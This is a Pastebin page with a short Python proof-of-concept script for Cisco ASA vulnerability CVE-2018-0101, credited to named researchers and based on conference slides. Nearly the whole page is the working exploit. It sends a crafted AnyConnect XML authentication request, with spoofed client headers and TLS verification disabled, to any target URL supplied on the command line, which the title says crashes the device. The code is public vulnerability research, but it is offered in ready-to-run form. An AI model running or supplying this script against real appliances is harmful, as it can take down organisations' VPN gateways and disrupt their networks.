daily pastebin goal
23%
SHARE
TWEET

Cisco ASA CVE-2018-0101 Crash PoC

a guest Feb 5th, 2018 16,254 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #
  2. # Cisco ASA CVE-2018-0101 Crash PoC
  3. #
  4. # We basically just read @saidelike slides:
  5. # https://www.nccgroup.trust/globalassets/newsroom/uk/events/2018/02/reconbrx2018-robin-hood-vs-cisco-asa.pdf
  6. #
  7. # @zerosum0x0, @jennamagius, @aleph___naught
  8. #
  9.  
  10. import requests, sys
  11.  
  12. headers = {}
  13. headers['User-Agent'] = 'Open AnyConnect VPN Agent v7.08-265-gae481214-dirty'
  14. headers['Content-Type'] = 'application/x-www-form-urlencoded'
  15. headers['X-Aggregate-Auth'] = '1'
  16. headers['X-Transcend-Version'] = '1'
  17. headers['Accept-Encoding'] = 'identity'
  18. headers['Accept'] = '*/*'
  19. headers['X-AnyConnect-Platform'] = 'linux-64'
  20. headers['X-Support-HTTP-Auth'] = 'false'
  21. headers['X-Pad'] = '0000000000000000000000000000000000000000'
  22.  
  23. xml = """<?xml version="1.0" encoding="UTF-8"?>
  24. <config-auth client="a" type="a" aggregate-auth-version="a">
  25.    <host-scan-reply>A</host-scan-reply>
  26. </config-auth>
  27. """
  28.  
  29. r = requests.post(sys.argv[1], data = xml, headers = headers, verify=False, allow_redirects=False)
  30.  
  31. print(r.status_code)
  32. print(r.headers)
  33. print(r.text)
RAW Paste Data
Top